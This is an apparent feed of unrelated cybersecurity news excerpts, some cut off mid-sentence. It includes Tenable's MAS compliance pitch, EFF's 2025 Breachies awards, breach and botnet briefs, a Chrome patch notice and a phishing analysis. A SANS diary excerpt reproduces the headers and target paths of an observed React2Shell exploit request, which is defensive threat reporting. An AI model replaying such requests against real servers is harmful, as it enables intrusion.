Attackers targeted admin accounts, and once authenticated, exported device configurations including hashed credentials and other sensitive information.
Anthropic proves that LLMs can be fairly resistant to abuse. Most developers are either incapable of building safer tools, or unwilling to invest in doing so.
And why most of the arguments do not hold up under scrutiny Over the past 18 to 24 months, venture capital has flowed into a fresh wave of SIEM challengers including Vega (which raised $65M in seed and Series A at a ~$400M valuation), Perpetual Systems, RunReveal, Iceguard, Sekoia, Cybersift, Ziggiz, and Abstract Security, all […]
For years, artificial intelligence sat at the edges of cybersecurity conversations. It appeared in product roadmaps, marketing claims, and isolated detection use cases, but rarely altered the fundamental dynamics between attackers and defenders. That changed in 2025. This year marked a clear inflection point where AI became operational on both sides of the threat landscape.
A series of actively exploited zero-day vulnerabilities affecting Windows, Google Chrome, and Apple platforms was disclosed in mid-December, according to The Hacker News, reinforcing a persistent reality for defenders: attackers no longer wait for exposure windows to close. They exploit them immediately. Unlike large-scale volumetric attacks that announce themselves through disruption, zero-day exploitation operates quietly.
The Monetary Authority of Singapore’s cloud advisory, part of its 2021 Technology Risk Management Guidelines, advises financial institutions to move beyond siloed monitoring to adopt a continuous, enterprise-wide approach. These firms must undergo annual audits. Here’s how Tenable can help.
Key takeaways:
High-stakes compliance: The MAS requires all financial institutions in Singapore to meet mandatory technology risk and cloud security guidelines and document compliance. Non-compliance can lead to severe financial penalties and business restrictions. Any third-party providers used by Singapore financial institutions must also comply with the standards.
The proactive mandate: Compliance requires a shift from static compliance checks to a continuous, proactive approach to managing exposure. This approach is essential for securing the key cloud risk areas mandated by MAS: identity and access management (IAM) and securing applications in the public cloud.
How to get there: Effective risk mitigation means breaking the most dangerous attack paths. Tenable Cloud Security, available in the Tenable One Exposure Management Platform, provides continuous monitoring, eliminates over-privileged permissions, and addresses misconfiguration risk.
Complying with government cybersecurity regulations can lull organizations into a false sense of security and lead to an over-reliance on point-in-time assessments conducted at irregular intervals. While such compliance efforts are essential to pass audits, they may do very little to actually reduce an organization’s risk. On the other hand, government efforts like the robust framework provided by the Monetary Authority of Singapore (MAS), Singapore’s central bank and integrated financial regulator, offer valuable guidance for organizations worldwide to consider as they look to reduce cyber risk.
The cloud advisory highlights key risks and control measures that Singapore’s financial institutions should consider before adopting public cloud services, including:
Developing a public cloud risk management strategy that takes into consideration the unique characteristics of public cloud services
Implementing strong controls in areas such as identity and access management (IAM), cybersecurity, data protection, and cryptographic key management
Expanding cybersecurity operations to include the security of public cloud workloads
Managing cloud resilience, outsourcing, vendor lock-in, and concentration risks
Ensuring the financial institution’s staff have the adequate skillsets to manage public cloud workloads and their risks.
The advisory recommends avoiding a siloed approach when performing security monitoring of on-premises apps or infrastructure and public cloud workloads. Instead, it advises financial institutions to “feed cyber-related information on public cloud workloads into their respective enterprise-wide IT security monitoring services to facilitate continuous monitoring and analysis of cyber events.”
Who must comply with MAS TRM and the cloud advisory?
While the MAS TRM guidelines and cloud advisory do not specifically state penalties for compliance failures, they are legally binding. They apply to all financial institutions operating under the authority’s regulation in Singapore, including banks, insurers, fintech firms, payment service providers, and venture capital managers. A financial institution in Singapore that leverages the services of a firm based outside the country must ensure that its service providers also meet the TRM requirements. MAS also factors adherence to the framework into its overall risk assessment of an organization; failure to comply can damage an organization's standing and reputation.
In short, the scope of accountability to the MAS TRM guidelines and cloud advisory is broad.
Complying with the MAS cloud advisory: How Tenable can help
We evaluated how the Tenable One Exposure Management Platform with Tenable Cloud Security can assist organizations in achieving and maintaining compliance with the MAS cloud advisory. Read on to understand two of the cloud advisory’s key focus areas and how to address them effectively with Tenable One — preventing dangerous attack path vectors from compromising sensitive cloud assets.
1. Identity and access management: Enforcing least privilege access
The MAS cloud advisory calls for financial institutions to “enforce the principle of least privilege stringently” when granting access to assets in the public cloud. It further advises firms to consider adopting zero trust principles in the architecture design of applications, where “access to public cloud services and resources is evaluated and granted on a per-request and need-to basis.”
At Tenable, we believe applying least privilege in Identity Access Management (IAM) is the cornerstone for effective cloud security. In the cloud, excessive permissions on accounts that can access sensitive data are a direct route to a breach.
How Tenable can help: CIEM and sensitive data protection
The Tenable Cloud Security domain within Tenable One offers integrated cloud infrastructure entitlement management (CIEM) that enforces strict least privilege across human and machine identities in Amazon Web Services (AWS), Google Cloud Platform (GCP), Microsoft Azure, Oracle Cloud Infrastructure (OCI), and Kubernetes environments.
Eliminate lateral movement: CIEM analyzes policies to identify privilege escalation risks and lateral movement paths, effectively closing dangerous attack vectors.
Data-driven prioritization: Tenable provides automated data classification and correlates sensitive data exposure with overly permissive identities. This ensures remediation focuses on the exposures that threaten your most critical regulated data.
Mandatory controls: The platform automatically monitors for privileged users who lack multi-factor authentication (MFA) and checks for regular access key rotation.
Cutting-edge identity intelligence correlates overprivileged IAM identities with vulnerabilities, misconfigurations, and sensitive data to see where privilege misuse could have the greatest impact. Guided, least-privilege remediation closes these identity exposure gaps. Source: Tenable, December 2025
Here’s a detailed look at how Tenable can help with three of the cloud advisory’s IAM provisions:
MAS cloud advisory item
How Tenable helps
10. As IAM is the cornerstone of effective cloud security risk management, FIs should enforce the principle of “least privilege” stringently when granting access to information assets in the public cloud.
Tenable provides easy visualization of effective permissions through identity intelligence and permission mapping. By querying permissions across identities, you can quickly surface problems and revoke excessive permissions with automatically generated least privilege policies.
11. Financial institutions should implement multi-factor authentication (MFA) for staff with privileges to configure public cloud services through the CSPs’ metastructure, especially staff with top-level account privileges (e.g. known as the “root user” or “subscription owner” for some CSPs).
Tenable offers detailed monitoring for privileged users, including IAM users who don't have multi-factor authentication (MFA) enabled.
12. Credentials used by system/application services for authentication in the public cloud, such as “access keys,” should be changed regularly. If the credentials are not used, they should be deleted immediately.
Tenable's audits check for this specific condition. They can identify IAM users whose access keys have not been rotated within a specified time frame (e.g., 90 days). This helps you to quickly identify and address this security vulnerability
Source: Tenable, December 2025
2. Securing applications in the public cloud: Minimizing risk exposure
For financial institutions using microservices and containers, the MAS cloud advisory advises that, to reduce the attack surface, each container includes only the core software components needed by the application. The cloud advisory also notes that security tools made for traditional on-premises IT infrastructure (e.g. vulnerability scanners) may not run effectively on containers, and advises financial institutions to adopt container-specific security solutions for preventing, detecting, and responding to container-specific threats. For firms using IaC to provision or manage public cloud workloads, it further calls for implementing controls to minimize the risk of misconfigurations.
At Tenable, we believe this explicit mandate for specialized cloud and container security solutions underscores the need for continuous, accurate risk assessment. Tenable Cloud Security is purpose-built to meet these requirements with full Cloud Security Posture Management (CSPM) and Cloud Workload Protection (CWP) capabilities across your cloud footprint. This ability to see and protect every cloud asset — from code to container — is crucial for enabling contextual prioritization of risk. We also believe that relying solely on static vulnerability scoring systems, like the Common Vulnerability Scoring System (CVSS) is insufficient because it fails to reflect real-world exploitability. To ensure financial institutions focus remediation efforts where they matter most, Tenable Exposure Management, including Tenable Cloud Security, incorporates the Tenable Vulnerability Priority Rating (VPR) — dynamic, predictive risk scoring that allows teams to address the most immediate and exploitable threats first.
How Tenable can help: Container security and cloud-to-code traceability
Tenable unifies cloud workload protection (CWP) with cloud security posture management (CSPM) to provide continuous, contextual risk assessment.
Workload and container security: Tenable provides solutions tailored to your security domain:
For the cloud security professional: Tenable offers robust, agentless cloud workload protection capabilities that continuously scan for, detect and visualize critical risks such as vulnerabilities, sensitive data exposure, malware and misconfigurations across virtual machines, containers and serverless environments.
For the vulnerability management owner: Tenable offers a streamlined solution with unified visibility for hybrid environments, providing the core capabilities to extend vulnerability management best practices to cloud workloads: Tenable Cloud Vulnerability Management, ensures agentless multi-cloud coverage, scanning containers in registries (shift-left) and runtime to prevent the deployment of vulnerable images and detect drift in production.
Cloud-to-code traceability: This unique feature links runtime findings (e.g., an exposed workload) directly back to its IaC source code, allowing for rapid remediation and automated pull requests, minimizing misconfiguration risk as mandated by MAS.
Embed security and compliance throughout the development lifecycle, in DevOps workflows like HashiCorp Terraform and CloudFormation, to minimize risks. Detect issues in the cloud and suggest the fix in code. Source: Tenable, December 2025
Here’s a detailed look at how Tenable can help with two of the cloud advisory’s provisions related to securing applications in the public cloud:
MAS cloud advisory item
How Tenable helps
19. Applications that run in a public cloud environment may be packaged in containers, especially for applications adopting a microservices architecture. Financial institutions should ensure that each container includes only the core software components needed by the application to reduce the attack surface. As containers typically share a host operating system, financial institutions should run containers with a similar risk profile together (e.g., based on the criticality of the service or the data that are processed) to minimize risk exposure. As security tools made for traditional on-premise[s] IT infrastructure (e.g. vulnerability scanners) may not run effectively on containers, financial institutions should adopt [a] container-specific security solution for preventing, detecting, and responding to container-specific threats.
Tenable integrates with your CI/CD pipelines and container registries to provide visibility and control throughout the container lifecycle. Here's how it works:
Tenable scans container images for vulnerabilities, misconfigurations, and malware as they're being built and stored in registries. This is a "shift-left" approach, which means it helps you find and fix security issues early in the development process.
You can create and enforce security policies based on vulnerability scores, the presence of specific malware, or other security criteria.
Tenable's admission controllers act as runtime guardrails, ensuring that the policies you've defined are enforced at the point of deployment. This prevents deployment of images that failed initial scans or have since been found vulnerable, even if a developer tries to bypass the standard process.
20. Financial institutions should ensure stringent control over the granting of access to container orchestrators (e.g. Kubernetes), especially the use of the orchestrator administrative account, and the orchestrators’ access to container images. To ensure that only secure container images are used, a container registry could be established to facilitate tracking of container images that have met the financial institution’s security requirements.
Tenable's Kubernetes Security Posture Management (KSPM) component continuously scans your Kubernetes resources (like pods, deployments, and namespaces) to identify misconfigurations and policy violations. This allows you to:
Discover and remediate vulnerabilities and misconfigurations before they can be exploited.
Continuously audit your environment against industry standards, like the Center for Internet Security (CIS) benchmarks for Kubernetes.
Get a single, centralized view of your security posture across multiple Kubernetes clusters.
Tenable’s admission controllers act as gatekeepers to your Kubernetes cluster. When a user or a system attempts to deploy a new container image, the admission controller intercepts the request before it's fully scheduled. It then checks the image against your defined security policies. Your policies can be based on factors such as:
Vulnerability scores (e.g., block any image with a critical vulnerability)
Compliance violations (e.g., block images that don't meet a specific security standard)
The presence of malicious software or exposed secrets
If the image violates any of these policies, the admission controller denies the deployment, preventing the vulnerable container from ever reaching production.
Source: Tenable, December 2025
Gaining the upper hand on MAS compliance through a unified ecosystem view
Tenable One is the market-leading exposure management platform, normalizing, contextualizing, and correlating security signals from all domains, including cloud — across vulnerabilities, misconfigurations, and identities spanning your hybrid estate. Exposure management enables cross-functional alignment between SecOps, DevOps, and governance, risk and compliance (GRC) teams with a shared, unified view of risk.
Tenable Cloud Security, part of Tenable One, unifies vision, insight, and action to support continuous adherence to the MAS cloud advisory across multi-cloud and hybrid environments. Source: Tenable, December 2025
Tenable Cloud Security, part of the Tenable One Exposure Management platform, supports continuous adherence to the MAS cloud advisory and enables risk-based decision-making by eliminating the toxic combinations that attackers exploit. The platform unifies security insight, transforming the effort to achieve compliance from a necessary burden into a strategic advantage.
Raise your hand if you’ve fallen victim to a vendor-led conversation around their latest AI-driven platform over the past calendar year. Keep it up if the pitch leaned on “next-gen,” “market-shaping,” or “best-in-class” while they nudged another product into your stack. If your hand is still up, you are not alone. MSPs are the target because you sit between shrinking budgets and rising risk.
Another year has come and gone, and with it, thousands of data breaches that affect millions of people. The question these days is less, Is my information in a data breach this year? and more How many data breaches had my information in them this year?
Some data breaches are more noteworthy than others. Where one might affect a small number of people and include little useful information, like a name or email address, others might include data ranging from a potential medical diagnosis to specific location information. To catalog and talk about these breaches we created the Breachies, a series of tongue-in-cheek awards, to highlight the most egregious data breaches.
In most cases, if these companies practiced a privacy first approach and focused on data minimization, only collecting and storing what they absolutely need to provide the services they promise, many data breaches would be far less harmful to the victims. But instead, companies gobble up as much as they can, store it for as long as possible, and inevitably at some point someone decides to poke in and steal that data. Once all that personal data is stolen, it can be used against the breach victims for identity theft, ransomware attacks, and to send unwanted spam. It has become such a common occurrence that it’s easy to lose track of which breaches affect you, and just assume your information is out there somewhere. Still, a few steps can help protect your information.
The Say Something Without Saying Anything Award: Mixpanel
We’ve long warned that apps delivering your personal information to third-parties, even if they aren’t the ad networks directly driving surveillance capitalism, presents risks and a salient target for hackers. The more widespread your data, the more places attackers can go to find it. Mixpanel, a data analytics company which collects information on users of any app which incorporates its SDK, suffered a major breach in November this year. The service has been used by a wide array of companies, including the Ring Doorbell App, which we reported on back in 2020 delivering a trove of information to Mixpanel, and PornHub, which despite not having worked with the company since 2021, had its historical record of paying subscribers breached.
There’s a lot we still don’t know about this data breach, in large part because the announcement about it is so opaque, leaving reporters with unanswered questions about how many were affected, if the hackers demanded a ransom, and if Mixpanel employee accounts utilized standard security best practices. One thing is clear, though: the breach was enough for OpenAI to drop them as a provider, disclosing critical details on the breach in a blog post that Mixpanel’s own announcement conveniently failed to mention.
The worst part is that, as a data analytics company providing libraries which are included in a broad range of apps, we can surmise that the vast majority of people affected by this breach have no direct relationship with Mixpanel, and likely didn’t even know that their devices were delivering data to the company. These people deserve better than vague statements by companies which profit off of (and apparently insufficiently secure) their data.
The We Still Told You So Award: Discord
Last year, AU10TIX won our first The We Told You So Award because as we predicted in 2023,age verification mandates would inevitably lead to more data breaches, potentially exposing government IDs as well as information about the sites that a user visits. Like clockwork, they did. It was our first We Told You So Breachies award, but we knew it wouldn’t be the last.
Nonetheless, this year’s winner of The We Still Told You So Breachies Award is the messaging app, Discord— once known mainly for gaming communities, it now hosts more than 200 million monthly active users and is widely used to host fandom and community channels.
In September of this year, much of Discord’s age verification data was breached — including users’ real names, selfies, ID documents, email and physical addresses, phone numbers, IP addresses, and other contact details or messages provided to customer support. In some cases, “limited billing information” was also accessed—including payment type, the last four digits of credit card numbers, and purchase histories.
Technically though, it wasn’t Discord itself that was hacked but their third-party customer support provider — a company called Zendesk—that was compromised, allowing attackers to access Discord’s user data. Either way, it’s Discord users who felt the impact.
The Tea for Two Award: Tea Dating Advice and TeaOnHer
Speaking of age verification, Tea, the dating safety app for women, had a pretty horrible year for data breaches. The app allows users to anonymously share reviews and safety information about their dates with men—helping keep others safe by noting red flags they saw during their date.
Since Tea is aimed at women’s safety and dating advice, the app asks new users to upload a selfie or photo ID to verify their identity and gender to create an account. That’s some pretty sensitive information that the app is asking you to trust it with! Back in July, it was reported that 72,000 images had been leaked from the app, including 13,000 images of photo IDs and 59,000 selfies. These photos were found via an exposed database hosted on Google’s mobile app development platform, Firebase. And if that isn’t bad enough, just a week later a second breach exposed private messages between users, including messages with phone numbers, abortion planning, and discussions about cheating partners. This breach included more than 1.1 million messages from early 2023 all the way to mid-2025, just before the breach was reported. Tea released a statement shortly after, temporarily disabling the chat feature.
But wait, there’s more. A completely different app based on the same idea, but for men, also suffered a data breach. TeaOnHer failed to protect similar sensitive data. In August, TechCrunch discovered that user information — including emails, usernames, and yes, those photo IDs and selfies — was accessible through a publicly available web address. Even worse? TechCrunch also found the email address and password the app’s creator uses to access the admin page.
Breaches like this are one of the reasons that EFF shouts from the rooftops against laws that mandate user verification with an ID or selfie. Every company that collects this information becomes a target for data breaches — and if a breach happens, you can’t just change your face.
The Just Stop Using Tracking Tech Award: Blue Shield of California
Another year, another data breach caused by online tracking tools.
In April, Blue Shield of California revealed that it had shared 4.7 million people’s health data with Google by misconfiguring Google Analytics on its website. The data, which may have been used for targeted advertising, included: people’s names, insurance plan details, medical service providers, and patient financial responsibility. The health insurance company shared this information with Google for nearly three years before realizing its mistake.
If this data breach sounds familiar, it’s because it is: last year’s Just Stop Using Tracking Tech awardalso went to a healthcare company that leaked patient data through tracking code on its website. Tracking tools remain alarminglycommon on healthcare websites, even after yearsofincidentslikethisone. These tools are marketed as harmless analytics or marketing solutions, but can expose people’s sensitive data to advertisers and data brokers.
EFF’s free Privacy Badger extension can block online trackers, but you shouldn’t need an extension to stop companies from harvesting and monetizing your medical data. We need a strong, federal privacy law and ban on online behavioral advertising to eliminate the incentives driving companies to keep surveilling us online.
The Hacker's Hall Pass Award: PowerSchool
In December 2024, PowerSchool, the largest provider of student information systems in the U.S., gave hackers access to sensitive student data. The breach compromised personal information of over 60 million students and teachers, including Social Security numbers, medical records, grades, and special education data. Hackers exploited PowerSchool’s weak security—namely, stolen credentials to their internal customer support portal—and gained unfettered access to sensitive data stored by school districts across the country.
PowerSchool failed to implement basic security measures like multi-factor authentication, and the breach affected districts nationwide. In Texas alone, over 880,000 individuals’ data was exposed, prompting the state's attorney general to file a lawsuit, accusing PowerSchool of misleading its customers about security practices. Memphis-Shelby County Schools also filed suit, seeking damages for the breach and the cost of recovery.
While PowerSchool paid hackers an undisclosed sum to prevent data from being published, the company’s failure to protect its users’ data raises serious concerns about the security of K-12 educational systems. Adding to the saga, a Massachusetts student, Matthew Lane, pleaded guilty in October to hacking and extorting PowerSchool for $2.85 million in Bitcoin. Lane faces up to 17 years in prison for cyber extortion and aggravated identity theft, a reminder that not all hackers are faceless shadowy figures — sometimes they’re just a college kid.
The Worst. Customer. Service. Ever. Award: TransUnion
Credit reporting giant TransUnion had to notify its customers this year that a hack nabbed the personal information of 4.4 million people. How'd the attackers get in? According to a letter filed with the Maine Attorney General's office obtained by TechCrunch, the problem was a “third-party application serving our U.S. consumer support operations.” That's probably not the kind of support they were looking for.
TransUnion said in a Texas filing that attackers swept up “customers’ names, dates of birth, and Social Security numbers” in the breach, though it was quick to point out in public statements that the hackers did not access credit reports or “core credit data.” While it certainly could have been worse, this breach highlights the many ways that hackers can get their hands on information. Coming in through third-parties, companies that provide software or other services to businesses, is like using an unguarded side door, rather than checking in at the front desk. Companies, particularly those who keep sensitive personal information, should be sure to lock down customer information at all the entry points. After all, their decisions about who they do business with ultimately carry consequences for all of their customers — who have no say in the matter.
The Annual Microsoft Screwed Up Again Award: Microsoft
Microsoft is a company nobody feels neutral about. Especially in the infosec world. The myriad software vulnerabilities in Windows, Office, and other Microsoft products over the decades has been a source of frustration and also great financial rewards for both attackers and defenders. Yet still, as the saying goes: “nobody ever got fired for buying from Microsoft.” But perhaps, the times, they are a-changing.
Zero-days happen to tech companies, large and small. It’s nearly impossible to write even moderately complex software that is bug and exploit free, and Microsoft can’t exactly be blamed for having a zero-day in their code. But when one company is the source of so many zero-daysconsistently for so many years, one must start wondering whether they should put all their eggs (or data) into a basket that company made. Perhaps if Microsoft’s monopolistic practices had been reined in back in the 1990s we wouldn’t be in a position today where Sharepoint is the defacto file sharing software for so many major organizations. And maybe, just maybe, this is further evidence that tech monopolies and centralization of data aren’t just bad for consumer rights, civil liberties, and the economy—but also for cybersecurity.
The Silver Globe Award: Flat Earth Sun, Moon & Zodiac
Look, we’ll keep this one short: in October of last year, researchers found security issues in the flat earther app, Flat Earth, Sun, Moon, & Clock. In March of 2025, that breach was confirmed. What’s most notable about this, aside from including a surprising amount of information about gender, name, email addresses and date of birth, is that it also included users’ location info, including latitude and longitude. Huh, interesting.
The I Didn’t Even Know You Had My Information Award: Gravy Analytics
In January, hackers claimed they stole millions of people’s location history from a company that never should’ve had it in the first place: location data broker Gravy Analytics. The data included timestamped location coordinates tied to advertising IDs, which can reveal exceptionally sensitive information. In fact, researchers who reviewed the leaked data found it could be used to identify military personnel and gay people in countries where homosexuality is illegal.
The breach of this sensitive data is bad, but Gravy Analytics’s business model of regularly harvesting and selling it is even worse. Despite the fact that most people have never heard of them, Gravy Analytics has managed to collect location information from a billion phones a day. The company has sold this data to other data brokers, makers of police surveillance tools, and the U.S. government.
How did Gravy Analytics get this location information from people’s phones? The data broker industry is notoriously opaque, but this breach may have revealed some of Gravy Analytics’ sources. The leaked data referencedthousands of apps, including Microsoft apps, Candy Crush, Tinder, Grindr, MyFitnessPal, pregnancy trackers and religious-focused apps. Many of these app developers said they had no relationship with Gravy Analytics. Instead, expert analysis of the data suggests it was harvested through the advertising ecosystem already connected to most apps. This breach provides further evidence that online behavioral advertising fuels the surveillance industry.
The Keeping Up With My Cybertruck Award: Teslamate
TeslaMate, a tool meant to track Tesla vehicle data (but which is not owned or operated by Tesla itself), has become a cautionary tale about data security. In August, a security researcher found more than 1,300 self-hosted TeslaMate dashboards were exposed online, leaking sensitive information such as vehicle location, speed, charging habits, and even trip details. In essence, your Cybertruck became the star of its own Keeping Up With My Cybertruck reality show, except the audience wasn’t made up of fans interested in your lifestyle, just random people with access to the internet.
TeslaMate describes itself as “that loyal friend who never forgets anything!” — but its lack of proper security measures makes you wish it would. This breach highlights how easily location data can become a tool for harassment or worse, and the growing need for legislation that specifically protects consumer location data. Without stronger regulations around data privacy, sensitive location details like where you live, work, and travel can easily be accessed by malicious actors, leaving consumers with no recourse.
The Disorder in the Courts Award: PACER
Confidentiality is a core principle in the practice of law. But this year a breach of confidentiality came from an unexpected source: a breach of the federal court filing system. In August, Politico reported that hackers infiltrated the Case Management/Electronic Case Files (CM/ECF) system, which uses the same database as PACER, a searchable public database for court records. Of particular concern? The possibility that the attack exposed the names of confidential informants involved in federal cases from multiple court districts. Courts across the country acted quickly to set up new processes to avoid the possibility of further compromises.
The leak followed a similar incident in 2021 and came on the heels of a warning to Congress that the file system is more than a little creaky. In fact, an IT official from the federal court system told the House Judiciary Committeethat both systems are “unsustainable due to cyber risks, and require replacement.”
The Only Stalkers Allowed Award: Catwatchful
Just like last year, a stalkerware company was subject to a data breach that really should prove once and for all that these companies must be stopped. In this case, Catwatchful is an Android spyware company that sells itself as a “child monitoring app.” Like other products in this category, it’s designed to operate covertly while uploading the contents of a victim’s phone, including photos, messages, and location information.
This data breach was particularly harmful, as it included not just the email addresses and passwords on the customers who purchased the app to install on a victim’s phone, but also the data from the phones of 26,000 victims’ devices, which could include the victims’ photos, messages, and real-time location data.
This was a tough award to decide on because Catwatchful wasn’t the only stalkerware company that was hit this year. Similar breaches to SpyX, Cocospy, and Spyic were all strong contenders. EFF has worked tirelessly to raise the alarm on this sort of software, and this year worked with AV Comparatives to test the stalkerware detection rate on Android of various major antivirus apps.
The Why We’re Still Stuck on Unique Passwords Award: Plex
Every year, we all get a reminder about why using unique passwords for all our accounts is crucial for protecting our online identities. This time around, the award goes to Plex, who experienced a data breach that included customer emails, usernames, and hashed passwords (which is a fancy way of saying passwords are scrambled through an algorithm, but it is possible they could still be deciphered).
If this all sounds vaguely familiar to you for some reason, that’s because a similar issue also happened to Plex in 2022, affecting 15 million users. Whoops.
The Uh, Yes, Actually, I Have Been Pwned Award: Troy Hunt’s Mailing List
Troy Hunt, the person behind Have I Been Pwned?and who has more experience with data breaches than just about anyone, also proved that anyone can be pwned. In a blog post, he details what happened to his mailing list:
You know when you're really jet lagged and really tired and the cogs in your head are just moving that little bit too slow? That's me right now, and the penny has just dropped that a Mailchimp phish has grabbed my credentials, logged into my account and exported the mailing list for this blog.
And he continues later:
I'm enormously frustrated with myself for having fallen for this, and I apologise to anyone on that list. Obviously, watch out for spam or further phishes and check back here or via the social channels in the nav bar above for more.
The whole blog is worth a read as a reminder that phishing can get anyone, and we thank Troy Hunt for his feedback on this and other breaches to include this year.
Tips to Protect Yourself
Data breaches are such a common occurrence that it’s easy to feel like there’s nothing you can do, nor any point in trying. But privacy isn’t dead. While some information about you is almost certainly out there, that’s no reason for despair. In fact, it’s a good reason to take action.
There are steps you can take right now with all your online accounts to best protect yourself from the the next data breach (and the next, and the next):
Use two-factor authentication when a service offers it. Two-factor authentication makes your online accounts more secure by requiring additional proof (“factors”) alongside your password when you log in. While two-factor authentication adds another step to the login process, it’s a great way to help keep out anyone not authorized, even if your password is breached.
Delete old accounts: Sometimes, you’ll get a data breach notification for an account you haven’t used in years. This can be a nice reminder to delete that account, but it’s better to do so before a data breach happens, when possible. Try to make it a habit to go through and delete old accounts once a year or so.
Freeze your credit. Many experts recommend freezing your credit with the major credit bureaus as a way to protect against the sort of identity theft that’s made possible by some data breaches. Freezing your credit prevents someone from opening up a new line of credit in your name without additional information, like a PIN or password, to “unfreeze” the account. This might sound absurd considering they can’t even open bank accounts, but if you have kids, you can freeze their credit too.
Keep a close eye out for strange medical bills. With the number of health companies breached this year, it’s also a good idea to watch for healthcare fraud. The Federal Trade Commission recommends watching for strange bills, letters from your health insurance company for services you didn’t receive, and letters from debt collectors claiming you owe money.
(Dis)Honorable Mentions
According to one report, 2025 had already seen 2,563 data breaches by October, which puts the year on track to be one of the worst by the sheer number of breaches.
We did not investigate every one of these 2,500-plus data breaches, but we looked at a lot of them, including the news coverage and the data breach notification letters that many state Attorney General offices host on their websites. We can’t award the coveted Breachies Award to every company that was breached this year. Still, here are some (dis)honorable mentions we wanted to highlight:
SonicWall has rolled out fixes to address a security flaw in Secure Mobile Access (SMA) 100 series appliances that it said has been actively exploited in the wild.
The vulnerability, tracked as CVE-2025-40602 (CVSS score: 6.6), concerns a case of local privilege escalation that arises as a result of insufficient authorization in the appliance management console (AMC).
It affects the following
A new distributed denial-of-service (DDoS) botnet known as Kimwolf has enlisted a massive army of no less than 1.8 million infected devices comprising Android-based TVs, set-top boxes, and tablets, and may be associated with another botnet known as AISURU, according to findings from QiAnXin XLab.
"Kimwolf is a botnet compiled using the NDK [Native Development Kit]," the company said in a report
The Russian state-sponsored threat actor known as APT28 has been attributed to what has been described as a "sustained" credential-harvesting campaign targeting users of UKR[.]net, a webmail and news service popular in Ukraine.
The activity, observed by Recorded Future's Insikt Group between June 2024 and April 2025, builds upon prior findings from the cybersecurity company in May 2024 that
The threat actor linked to Operation ForumTroll has been attributed to a fresh set of phishing attacks targeting individuals within Russia, according to Kaspersky.
The Russian cybersecurity vendor said it detected the new activity in October 2025. The origins of the threat actor are presently unknown.
"While the spring cyberattacks focused on organizations, the fall campaign honed in on
I have already talked about various React2Shell exploit attempts we have observed in the last weeks. But new varieties of the exploit are popping up, and the most recent one is using this particular version of the exploit:
POST /app HTTP/1.1
Host: 81.187.66.58
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary7MA4YWxkTrZu0gW
Next-Action: 0
Rsc-Action: 0
Content-Length: 388
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept: */*
Connection: close
The overall idea is similar to what we have seen in the past. This version adds the "Rsc-Action" header, which I assume is supposed to target sites that expose react server components without Next.js. The "Next-Action" header is still present as well. The scans are also attempting different URLs:
/
/api
/app
/api/route
/_next/server
Other exploits have focused on the index page (/). I assume the pool of vulnerable systems is running dry, and attackers are diversifying their exploits a bit. Sadly, the host providing instructions for what to do next (45.153.34.201) is no longer providing these instructions.
--
Johannes B. Ullrich, Ph.D. , Dean of Research, SANS.edu Twitter|
--
Johannes B. Ullrich, Ph.D. , Dean of Research, SANS.edu Twitter|
(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.
Google issued an extra patch addressing two security vulnerabilities in Chrome, both of which can be triggered remotely by an attacker when a user visits a specially crafted, malicious web page.
Chrome is by far the world’s most popular browser, with an estimated 3.4 billion users. That makes it a massive target. When Chrome has a security flaw that can be triggered just by visiting a website, billions of users are exposed until they update.
That’s why it’s important to install these patches promptly. Staying unpatched means you could be at risk just by browsing the web. Attackers often try to exploit browser vulnerabilities quickly, before most users have a chance to update. Always let Chrome update itself, and don’t delay restarting it, as updates usually fix exactly this kind of risk.
How to update Chrome
The latest version number is 143.0.7499.146/.147 for Windows and macOS, and 143.0.7499.146 for Linux. So, if your Chrome is on version 143.0.7499.146 or later, it’s protected from these vulnerabilities.
The easiest way to update is to allow Chrome to update automatically, but you can end up lagging behind if you never close your browser or if something goes wrong—such as an extension stopping you from updating the browser.
To update manually, click the More menu (three dots), then go to Settings > About Chrome. If an update is available, Chrome will start downloading it. Restart Chrome to complete the update, and you’ll be protected against these vulnerabilities.
One of the vulnerabilities was found in the WebGPU web graphics API, which allows for graphics processing, games, and more, as well as AI and machine learning applications. This vulnerability, tracked as CVE-2025-14765 is a use-after-free vulnerability that could allow a remote attacker to potentially exploit heap corruption via a crafted HTML page.
Use-after-free is a class of vulnerability caused by incorrect use of dynamic memory during a program’s operation. If, after freeing a memory location, a program does not clear the pointer to that memory, an attacker may be able to use the error to manipulate the program.
Heap corruption occurs when a program inadvertently damages the allocator’s view of the heap, which can lead to unexpected alterations in memory. The heap is a region of memory used for dynamic memory allocation.
The other vulnerability, known as CVE-2025-14766 was—once again—found in the V8 engine as an out-of-bounds read and write.
V8 is the engine that Google developed for processing JavaScript, and it has seen more than its fair share of bugs.
An out-of-bounds read and write vulnerability means an attacker may be able to manipulate parts of the device’s memory that should be out of their reach. Such a flaw allows a program to read or write outside the bounds the program sets, enabling attackers to manipulate other parts of the memory allocated to more critical functions. Attackers could write code to a part of the memory where the system executes it with permissions that the program and user should not have.
In this case, the vulnerability could be exploited when the engine processes specially crafted HTML content, such as a malicious website.
We don’t just report on threats—we remove them
Cybersecurity risks should never spread beyond a headline. Keep threats off your devices by downloading Malwarebytes today.
A Chrome browser extension with 6 million users, as well as seven other Chrome and Edge extensions, for months have been silently collecting data from every AI chatbot conversion, packaging it, and then selling it to third parties like advertisers and data brokers, according to Koi Security.
A PDF named “NEW Purchase Order # 52177236.pdf” turned out to be a phishing lure. So we analyzed the phishing script behind it.
A customer contacted me when Malwarebytes blocked the link inside a “purchase order” email they had received.
Malwarebytes blocked this ionoscloud.com subdomain
When I examined the attachment, it soon became clear why we blocked it.
The visible content of the PDF showed a button prompting the recipient to view the purchase order. Hovering over the button revealed a long URL that included a reference to a PDF viewer. While this might fool some people at first glance, a closer look raised red flags:
Hovering over the button to see where it goes
Since I’m rarely able to control my curiosity, I temporarily added an exclusion to Malwarebytes’ web protection so I could see where the link would take me. The destination was a website displaying a login form with the target’s email address already filled in (the address shown here was fabricated by me):
The objective was clear: phishing. But the site’s source code didn’t reveal much.
The most likely objective was to harvest business email addresses and their passwords. Attackers commonly test these credentials against enterprise services such as Microsoft Outlook, Google Workspace, VPNs, file-sharing platforms, and payroll systems. The deliberately vague prompt for a “business email” increases the likelihood that users will provide corporate credentials rather than personal ones.
